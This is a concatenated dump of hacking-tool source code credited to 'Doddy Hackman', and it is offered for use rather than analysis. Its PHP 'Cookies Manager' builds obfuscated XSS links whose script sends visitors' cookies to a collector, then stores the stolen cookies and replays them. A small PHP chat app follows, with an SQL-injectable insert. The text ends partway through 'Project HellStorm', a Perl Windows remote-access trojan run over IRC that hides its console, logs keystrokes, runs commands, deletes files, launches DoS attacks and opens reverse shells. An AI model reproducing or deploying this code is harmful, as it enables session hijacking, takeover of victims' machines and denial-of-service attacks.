<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>';
if (isset($_POST['login'])) {
$test_username = $_POST['username'];
$test_password = md5($_POST['password']);
if ($test_username == $username && $test_password == $password) {
setcookie("login", base64_encode($test_username . "@" . $test_password));
echo "<script>alert('Welcome idiot');</script>";
$ruta = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']) . "/" . $index;
echo '<meta http-equiv="refresh" content="0; url=' . htmlentities($ruta) . '" />';
} else {
echo "<script>alert('Fuck You');</script>";
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
}
// The End ?
?>
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin"; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
// DB
$host = "localhost"; // Edit
$userw = "root"; // Edit
$passw = ""; // Edit
$db = "cookies"; // Edit
// Functions
function hex_encode($text)
{
$texto = chunk_split(bin2hex($text), 2, '%');
return $texto = '%' . substr($texto, 0, strlen($texto) - 1);
}
function parsear_cookie($leyendo)
{
$leyendo = str_replace("comment=", "", $leyendo);
$leyendo = str_replace("Set-Cookie: ", "", $leyendo);
$contenido = explode(";", $leyendo);
$nombre = "";
$valor_cookie = "";
$expires = "";
$path = "";
$domain = "";
$secure = "false";
$httponly = "false";
foreach ($contenido as $valor) {
if (preg_match("/expires=(.*)/", $valor, $regex)) {
$expires = $regex[1];
}
elseif (preg_match("/path=(.*)/", $valor, $regex)) {
$path = $regex[1];
} elseif (preg_match("/domain=(.*)/", $valor, $regex)) {
$domain = $regex[1];
} elseif (preg_match("/secure=(.*)/", $valor, $regex)) {
$secure = $regex[1];
} elseif (preg_match("/httponly=(.*)/", $valor, $regex)) {
$httponly = $regex[1];
}
else {
if (preg_match("/(.*)=(.*)/", $valor, $regex)) {
$nombre = $regex[1];
$valor_cookie = $regex[2];
}
}
}
return array(
$nombre,
$valor_cookie,
$expires,
$path,
$domain,
$secure,
$httponly
);
}
function ver_cookies_de_pagina($pagina)
{
$cookies = "";
if (!function_exists('curl_exec')) {
$options = array(
'http' => array(
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
);
$context = stream_context_create($options);
file_get_contents($pagina);
foreach ($http_response_header as $valores) {
if (preg_match("/Set-Cookie/", $valores)) {
$valores = str_replace("Set-Cookie:", "", $valores);
$cookies = $cookies . trim($valores) . "\n";
}
}
} else {
$nave = curl_init($pagina);
curl_setopt($nave, CURLOPT_TIMEOUT, 5);
curl_setopt($nave, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($nave, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
curl_setopt($nave, CURLOPT_HEADER, 1);
curl_setopt($nave, CURLOPT_NOBODY, 1);
$contenido = curl_exec($nave);
curl_close($nave);
$leyendo = explode("\n", trim($contenido));
foreach ($leyendo as $valores) {
if (preg_match("/Set-Cookie/", $valores)) {
$valores = str_replace("Set-Cookie:", "", $valores);
$cookies = $cookies . trim($valores) . "\n";
}
}
}
return $cookies;
}
function toma($target)
{
$code = "";
if (function_exists('curl_exec')) {
$nave = curl_init($target);
curl_setopt($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
curl_setopt($nave, CURLOPT_TIMEOUT, 5);
curl_setopt($nave, CURLOPT_RETURNTRANSFER, true);
$code = curl_exec($nave);
} else {
$options = array(
'http' => array(
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
);
$context = stream_context_create($options);
$code = file_get_contents($target);
}
return $code;
}
//
error_reporting(0);
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
if (isset($_GET['id'])) {
if (empty($_GET['id'])) {
error();
}
$dia = mysql_real_escape_string(date("d.m.Y"));
$ip = mysql_real_escape_string($_SERVER["REMOTE_ADDR"]);
if ($ip == "::1") {
$ip = "127.0.0.1";
}
$info = mysql_real_escape_string($_SERVER["HTTP_USER_AGENT"]);
$ref = mysql_real_escape_string($_SERVER["HTTP_REFERER"]);
$cookie = mysql_real_escape_string($_GET['id']);
mysql_query("INSERT INTO cookies_found(id,fecha,ip,info,cookie) values(NULL,'$dia','$ip','$info','$cookie')");
header("Location:http://www.google.com.ar");
}
elseif (isset($_COOKIE['login'])) {
$st = base64_decode($_COOKIE['login']);
$plit = explode("@", $st);
$user = $plit[0];
$pass = $plit[1];
if ($user == $username and $pass == $password) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Cookies Manager 0.6</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="images/icono.png">
</head>
<body>
<center>';
echo '<br><img src="images/cookies.png" /><br>';
if (isset($_POST['makecookies'])) {
if (setcookie($_POST['name_cookie'], $_POST['value_cookie'], time() + 7200, $_POST['path_cookie'], $_POST['domain_cookie'])) {
echo "<script>alert('Cookie maked');</script>";
} else {
echo "<script>alert('Error making Cookie');</script>";
}
}
$edit_name = "";
$edit_value = "";
$edit_expire = "";
$edit_path = "";
$edit_domain = "";
$edit_secure = "";
$edit_httponline = "";
if (isset($_POST['instalar'])) {
$cookies_found = "create table cookies_found (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
fecha TEXT NOT NULL,
ip TEXT NOT NULL,
info TEXT NOT NULL,
cookie TEXT NOT NULL,
PRIMARY KEY (id));
";
if (mysql_query($cookies_found)) {
echo "<script>alert('Installed');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
if (mysql_num_rows(mysql_query("show tables like 'cookies_found'"))) {
//
if (isset($_GET['del'])) {
if (is_numeric($_GET['del'])) {
if (@mysql_query("delete from cookies_found where id='" . $_GET['del'] . "'")) {
echo "<script>alert('Cookie deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
}
// Cookies Found
$re = mysql_query("select * from cookies_found order by id ASC");
$con = mysql_num_rows($re);
echo '
<div class="post">
<h3>Cookies Found : ' . $con . '</h3>
<div class="post_body"><br>';
if ($con <= 0) {
echo '<b>No cookies found</b><br>';
} else {
echo '<table>';
echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>";
while ($ver = mysql_fetch_array($re)) {
$cookies_view = $ver[4];
list($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($cookies_view);
echo "<td>" . htmlentities($ver[0]) . "</td><td>" . htmlentities($ver[1]) . "</td><td>" . htmlentities($ver[2]) . "</td><td>" . htmlentities($ver[3]) . "</td>";
echo "<td>" . htmlentities($cookies_view) . "</td><td>" . htmlentities($nombre) . "</td><td>" . htmlentities($valor_cookie) . "</td><td><a href=?del=" . htmlentities($ver[0]) . ">Delete</a></td><tr>";
}
echo "</table>";
}
echo ' <br></div>
</div>';
//
// Form para target
echo '
<div class="post">
<h3>Enter Target</h3>
<div class="post_body"><br>';
echo "
<form action='' method=POST>
<b>Link : </b><input type=text size=40 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr>
<input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'> <input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
</form>
";
echo ' <br></div>
</div>';
// URLS
if (isset($_POST['generateurl'])) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>';
echo "<textarea cols=50 name=code readonly>\n";
$script = hex_encode("<script>document.location='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id='+document.cookie;</script>");
//echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n";
$resultado_code = toma("http://tinyurl.com/api-create.php?url=" . $_POST['target'] . $script);
echo htmlentities($resultado_code);
echo "\n</textarea></table>";
echo ' <br><br></div>
</div>';
}
//
// Get Cookies
if (isset($_POST['getcookies'])) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>';
echo "<textarea cols=50 rows=10 name=code readonly>\n";
$resultado_code = ver_cookies_de_pagina($_POST['target']);
echo htmlentities($resultado_code);
echo "\n</textarea>";
echo ' <br><br></div>
</div>';
$leyendo_esto = split("\n", $resultado_code);
list($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($leyendo_esto[0]);
$edit_name = $nombre;
$edit_value = $valor_cookie;
$edit_expire = $expires;
$edit_path = $path;
$edit_domain = $domain;
$edit_secure = $secure;
$edit_httponline = $httponly;
}
//
// Form para crear cookies
echo '
<div class="post">
<h3>Cookie Maker</h3>
<div class="post_body"><br>';
echo "
<form action='' method=POST>
<b>Name : </b><input type=text size=50 name=name_cookie value='$edit_name'><br><br>
<b>Value : </b><input type=text size=50 name=value_cookie value='$edit_value'><br><br>
<b>Expires : </b><input type=text size=50 name=expire_cookie value='$edit_expire'><br><br>
<b>Path : </b><input type=text size=50 name=path_cookie value='$edit_path'><br><br>
<b>Domain : </b><input type=text size=50 name=domain_cookie value='$edit_domain'><br><br>
<b>Secure : </b><input type=text size=50 name=secure_cookie value='$edit_secure'><br><br>
<b>HTTP Online : </b><input type=text size=50 name=httponline_cookie value='$edit_httponline'><br><br>
<input type=submit name=makecookies style='height: 25px; width: 200px' value='Make Cookie'>
</form>";
echo ' <br></div>
</div>';
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">';
echo "
<form action='' method=POST>
<h2>Do you want install Cookies Manager ?</h2><br>
<input type=submit name=instalar value=Install>
</form><br>";
echo ' </div>
</div>';
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>';
} else {
echo "<script>alert('Fuck You');</script>";
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
}
// The End ?
?>
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background:transparent url("images/fondo.jpg") repeat scroll 0 0;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
}
a:link {
text-decoration:none;
color:orange;
}
a:visited {
color:orange;
}
a:hover {
color:orange;
}
td,tr {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
}
textarea {
font: normal 10px Verdana, Arial, Helvetica,sans-serif;
background-color:black;
color:gray;
border: solid #222 2px;
border-color:gray
}
input {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
}
.post {
background-color:black;
color:gray;
margin-bottom:10px;
width:600px;
word-wrap: break-word;
}
.post h3 {
background-color:black;
color:orange;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
.post_body {
background-color:black;
margin:-20px 0 0 0;
color:white;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
/* The End ? */
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
// Login
$username = "admin"; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
//
$index = "admin.php"; // Edit
if (isset($_GET['poraca'])) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>';
if (isset($_POST['login'])) {
$test_username = $_POST['username'];
$test_password = md5($_POST['password']);
if ($test_username == $username && $test_password == $password) {
setcookie("login", base64_encode($test_username . "@" . $test_password));
echo "<script>alert('Welcome idiot');</script>";
$ruta = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']) . "/" . $index;
echo '<meta http-equiv="refresh" content="0; url=' . htmlentities($ruta) . '" />';
} else {
echo "<script>alert('Fuck You');</script>";
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
}
// The End ?
?>
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
error_reporting(0);
// Login
$username = "admin"; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
// DB
$host = "localhost"; // Edit
$userw = "root"; // Edit
$passw = ""; // Edit
$db = "chat"; // Edit
if (isset($_COOKIE['login'])) {
$st = base64_decode($_COOKIE['login']);
$plit = explode("@", $st);
$user = $plit[0];
$pass = $plit[1];
if ($user == $username and $pass == $password) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DH Chat 0.5</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center>
';
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
echo ' <br><img src="images/chat.png" /><br>';
if (isset($_POST['instalar'])) {
$todo = "create table mensajes (
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
";
$todo2 = "create table insultos (
id_insulto int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
PRIMARY KEY (id_insulto));
";
if (mysql_query($todo)) {
if (mysql_query($todo2)) {
$insultos = array(
"lammer",
"lamer",
"maricon",
"noob"
);
foreach ($insultos as $con) {
@mysql_query("INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$con')");
}
echo "<script>alert('Installed');</script>";
echo '<meta http-equiv="refresh" content=0;URL=>';
}
} else {
echo "<script>alert('Error');</script>";
}
}
if (mysql_num_rows(mysql_query("show tables like 'mensajes'"))) {
//
$re = mysql_query("select * from mensajes order by id_comentario ASC");
if (isset($_GET['id'])) {
if (is_numeric($_GET['id'])) {
if (@mysql_query("delete from mensajes where id_comentario='" . $_GET['id'] . "'")) {
echo "<script>alert('Comment deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
}
$sql = "select id_comentario from mensajes";
$resultado = mysql_query($sql);
$cantidad = mysql_num_rows($resultado);
echo '
<div class="post">
<h3>Comments : ' . $cantidad . '</h3>
<div class="post_body"><br>';
if ($cantidad <= 0) {
echo '<b>No entries found</b><br>';
} else {
echo "<table>";
echo "<td><b>ID</b></td><td><b>Nick</b></td><td><b>Text</b></td><td><b>Option</b></td><tr>";
while ($ver = mysql_fetch_array($re)) {
echo "<td>" . htmlentities($ver[0]) . "</td><td>" . htmlentities($ver[2]) . "</td><td>" . htmlentities($ver[1]) . "</td><td><a href=?id=" . htmlentities($ver[0]) . ">Delete</a></td><tr>";
}
echo "</table>";
}
echo ' <br></div>
</div>';
if (isset($_POST['new_word'])) {
$in = $_POST['word'];
if (@mysql_query("INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$in')")) {
echo "<script>alert('Word added');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
if (isset($_GET['del_word'])) {
if (is_numeric($_GET['del_word'])) {
if (@mysql_query("delete from insultos where id_insulto='" . $_GET['del_word'] . "'")) {
echo "<script>alert('Word deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
}
echo '
<div class="post">
<h3>Block words</h3>
<div class="post_body"><br>
';
echo "
<form action='' method=POST>
<b>Word : </b><input type=text name=word>
<input type=submit name=new_word style='width: 100px;' value=Add>
</form>";
echo '
<br>
</div>
</div>
';
$sql = "select id_insulto from insultos";
$resultado = mysql_query($sql);
$cantidad = mysql_num_rows($resultado);
echo '
<div class="post">
<h3>Words blocked : ' . $cantidad . '</h3>
<div class="post_body"><br>
';
$rea = mysql_query("select * from insultos order by id_insulto ASC");
if ($cantidad <= 0) {
echo '<b>No entries found</b><br>';
} else {
echo "<table>";
echo "<td>ID</td><td>Word</td><td>Option</td><tr>";
while ($ver = mysql_fetch_array($rea)) {
echo "<td>" . htmlentities($ver[0]) . "</td><td>" . htmlentities($ver[1]) . "</td><td><a href=?del_word=" . htmlentities($ver[0]) . ">Delete</a></td><tr>";
}
echo "</table>";
}
echo '
<br>
</div>
</div>
';
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">';
echo "
<form action='' method=POST>
<h2>Do you want install DH Chat 0.5 ?</h2><br>
<input type=submit name=instalar style='width: 100px;' value=Install>
</form><br>";
echo ' </div>
</div>';
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>';
mysql_close();
exit(1);
} else {
echo "<script>alert('Fuck You');</script>";
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
}
// The End ?
?>
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background:transparent url("images/fondo.jpg") repeat scroll 0 0;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
}
a:link {
text-decoration:none;
color:orange;
}
a:visited {
color:orange;
}
a:hover {
color:orange;
}
td,tr {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
word-wrap: break-word;
word-break:break-all;
}
input {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
}
.post {
background-color:black;
color:gray;
margin-bottom:10px;
width:600px;
word-wrap: break-word;
}
.post h3 {
background-color:black;
color:orange;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
.post_body {
background-color:black;
margin:-20px 0 0 0;
color:white;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
/* The End ? */
<?php
//DH Chat 0.5
//(C) Doddy Hackman 2015
// DB
$host = "localhost"; // Edit
$user = "root"; // Edit
$pass = ""; // Edit
$db = "chat"; // Edit
//
error_reporting(0);
mysql_connect($host, $user, $pass);
mysql_select_db($db);
echo '<link href="chat.css" rel="stylesheet" type="text/css" />';
echo "<table border=0 width='210' style='table-layout: fixed'>";
echo "<td><b>DH Chat 0.5</b></td><tr>";
$sumo = mysql_query("SELECT MAX(id_comentario) FROM mensajes");
$s = mysql_fetch_row($sumo);
foreach ($s as $d) {
$total = $d;
}
$test = $total - 10;
if ($test <= 0) {
next;
} else {
$resto = $test;
for ($i = 1; $i <= $resto; $i++) {
@mysql_query("DELETE FROM mensajes where id_comentario='$i'");
}
}
$re = @mysql_query("select * from mensajes order by id_comentario DESC");
while ($ver = @mysql_fetch_array($re)) {
echo "<td><b>" . htmlentities($ver[2]) . "</b> : " . htmlentities($ver[1]) . "</td><tr>";
}
echo "<br><br><td><br><b>Comment</b><br><br>
<form action='' method=POST>
Nick : <input type=text name=apodo size=20><br><br>
Text : <input type=text name=msg size=20><br><br>
<input type=submit name=chatentro style='width: 100px;' value=Send>
</form>
<tr>
<td><b>Coded By Doddy H</b></td><tr>
</table>";
if (isset($_POST['chatentro'])) {
$sumo = mysql_query("SELECT MAX(id_comentario) FROM mensajes");
$s = mysql_fetch_row($sumo);
foreach ($s as $d) {
$x_id = $d + 1;
}
$apodo = htmlentities(addslashes($_POST['apodo']));
$mensaje = htmlentities(addslashes($_POST['msg']));
$apodo = substr($apodo, 0, 70);
$mensaje = substr($mensaje, 0, 70);
$rex = mysql_query("select mensaje from insultos");
while ($con = mysql_fetch_array($rex)) {
$mensaje = str_replace($con[0], "#$!*", $mensaje);
$apodo = str_replace($con[0], "#$!*", $apodo);
}
if (is_numeric($x_id)) {
@mysql_query("INSERT INTO mensajes(id_comentario,apodo,mensaje)values('$x_id','$apodo','$mensaje')");
}
echo '<meta http-equiv="refresh" content=0;URL=>';
}
mysql_close();
// The End ?
?>
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
}
a:link {
text-decoration:none;
color:orange;
}
a:visited {
color:orange;
}
a:hover {
color:orange;
}
td,tr {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
word-wrap: break-word;
word-break:break-all;
}
input {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
}
.post {
background-color:black;
color:gray;
margin-bottom:10px;
width:600px;
word-wrap: break-word;
}
.post h3 {
background-color:black;
color:orange;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
.post_body {
background-color:black;
margin:-20px 0 0 0;
color:white;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
/* The End ? */
<body background="test.jpg">
<?php
include("chat.php");
?>
#!usr/bin/perl
#Project HellStorm 1.2
#(C) Doddy Hackman 2015
#Necessary modules
#
#ppm install http://www.bribes.org/perl/ppm/Win32-API.ppd
#ppm install http://www.bribes.org/perl/ppm/Win32-GuiTest.ppd
#
#Use "perl2exe -gui server.pl" to hide console
#
use Win32::OLE;
use Win32::OLE qw(in);
use Win32::Process;
use Win32;
use Win32::API;
use Win32::GuiTest
qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
use Win32::Clipboard;
use threads;
use Net::FTP;
use Win32::File;
use Cwd;
use IO::Socket;
use Win32::Job;
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);
if ( $^O eq 'MSWin32' ) {
use Win32::Console;
Win32::Console::Free();
}
# FTP Configuration
my $host_ftp = "localhost"; # Edit
my $user_ftp = "doddy"; # Edit
my $pass_ftp = "123"; # Edit
# IRC Configuration
my $host_irc = "localhost"; # Edit
my $canal_irc = "#locos"; # Edit
my $port_irc = "6667"; # Edit
my $nick_irc = dameip(); # Edit
# Threads
# You must comment on the thread that you will not use
my $comando4 = threads->new( \&conexion_directa );
#my $comando5 = threads->new( \&keylogger );
#my $comando6 = threads->new(\&ircnow);
$comando4->join();
#$comando5->join();
#$comando6->join();
#
sub ircnow {
my $soquete = new IO::Socket::INET(
PeerAddr => $host_irc,
PeerPort => $port_irc,
Proto => "tcp"
);
print $soquete "NICK $nick_irc\r\n";
print $soquete "USER $nick_irc 1 1 1 1\r\n";
print $soquete "JOIN $canal_irc\r\n";
while ( my $logar = <$soquete> ) {
print "\r\n";
chomp($logar);
if ( $logar =~ /^PING(.*)$/i ) {
print $soquete "PONG $1\r\n";
}
if ( $logar =~ /:$nick_irc help/g ) {
my @commands = (
"msgbox <>", "getinfo",
"cmd <>", "dir",
"cd <>", "del <>",
"rename :<>:<>:", "cwd",
"verlogs", "word :<>:",
"crazymouse", "cambiarfondo :<>:",
"opencd", "closedcd",
"dosattack :<>:<>:<>:", "speak :<>:",
"iniciochau", "iniciovuelve",
"iconochau", "iconovuelve",
"backshell :<>:<>:", "procesos",
"cerrarproceso :<>:<>:"
);
print $soquete
"PRIVMSG $canal_irc : HellStorm (C) 2011 Doddy Hackman\r\n";
print $soquete "PRIVMSG $canal_irc : Commands : \r\n";
for (@commands) {
print $soquete "PRIVMSG $canal_irc : " . $_ . "\r\n";
}
}
if ( $logar =~ /:$nick_irc msgbox (.*)/g ) {
my $msg = $1;
chomp $msg;
cheats( "mensaje", $msg );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc getinfo/g ) {
my $re = getinfo();
if ( $re =~ /:(.*):(.*):(.*):(.*):(.*):/ ) {
print $soquete "PRIVMSG $canal_irc : [+] Domain : $1\r\n";
print $soquete "PRIVMSG $canal_irc : [+] Chip : $2\r\n";
print $soquete "PRIVMSG $canal_irc : [+] Version : $3\r\n";
print $soquete "PRIVMSG $canal_irc : [+] Username : $4\r\n";
print $soquete "PRIVMSG $canal_irc : [+] OS : $5\r\n";
}
}
if ( $logar =~ /:$nick_irc cmd (.*)/ ) {
my $cmda = $1;
chomp $cmda;
my @re = cmd($cmda);
for (@re) {
print $soquete "PRIVMSG $canal_irc : $_\r\n";
}
}
if ( $logar =~ /:$nick_irc dir/ ) {
my @files = navegador("listar");
for (@files) {
if ( -f $_ ) {
print $soquete "PRIVMSG $canal_irc : [File] : " . $_
. "\r\n";
}
else {
print $soquete "PRIVMSG $canal_irc : [Directory] : " . $_
. "\r\n";
}
}
}
if ( $logar =~ /:$nick_irc cd (.*)/ ) {
my $di = $1;
chomp $di;
if ( navegador( "cd", $di ) ) {
print $soquete "PRIVMSG $canal_irc : [+] Directory Changed\r\n";
}
else {
print $soquete "PRIVMSG $canal_irc : [-] Error\r\n";
}
}
if ( $logar =~ /:$nick_irc del (.*)/ ) {
my $file = $1;
chomp $file;
if ( navegador( "borrar", $1 ) ) {
print $soquete "PRIVMSG $canal_irc : [+] File deleted\r\n";
}
else {
print $soquete "PRIVMSG $canal_irc : [-] Error\r\n";
}
}
if ( $logar =~ /:$nick_irc rename :(.*):(.*):/ ) {
my ( $a, $b ) = ( $1, $2 );
if ( navegador( "rename", $a, $b ) ) {
print $soquete "PRIVMSG $canal_irc : [+] Changed\r\n";
}
else {
print $soquete "PRIVMSG $canal_irc : [-] Error\r\n";
}
}
if ( $logar =~ /:$nick_irc cwd/ ) {
print $soquete "PRIVMSG $canal_irc : [+] Directory : "
. getcwd() . "\r\n";
}
if ( $logar =~ /:$nick_irc verlogs/ ) {
print $soquete "PRIVMSG $canal_irc : [+] Logs\r\n";
my @word = openfilex("logs.txt");
for (@word) {
sleep 3;
print $soquete "PRIVMSG $canal_irc : " . $_ . "\r\n";
}
}
if ( $logar =~ /:$nick_irc word :(.*):/ig ) {
my $msg = $1;
cheats( "word", $msg );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc crazymouse/ig ) {
cheats("crazymouse");
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc cambiarfondo :(.*):/ig ) {
my $url = $1;
chomp $url;
cheats( "cambiarfondo", $url );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc opencd/ig ) {
cheats( "cd", "1" );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc closedcd/ig ) {
cheats( "cd", "0" );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /dosattack :(.*):(.*):(.*):/ ) {
my ( $i, $p, $t ) = ( $1, $2, $3 );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
dosattack( $i, $p, $t );
}
if ( $logar =~ /:$nick_irc speak :(.*):/ig ) {
my $t = $1;
chomp $t;
cheats( "speak", $t );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc iniciochau/ ) {
cheats( "inicio", "1" );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc iniciovuelve/ ) {
cheats( "inicio", "0" );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc iconochau/ ) {
cheats( "iconos", "1" );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc iconovuelve/ ) {
cheats( "iconos", "0" );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc backshell :(.*):(.*):/ig ) {
backshell( $1, $2 );
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
if ( $logar =~ /:$nick_irc procesos/ ) {
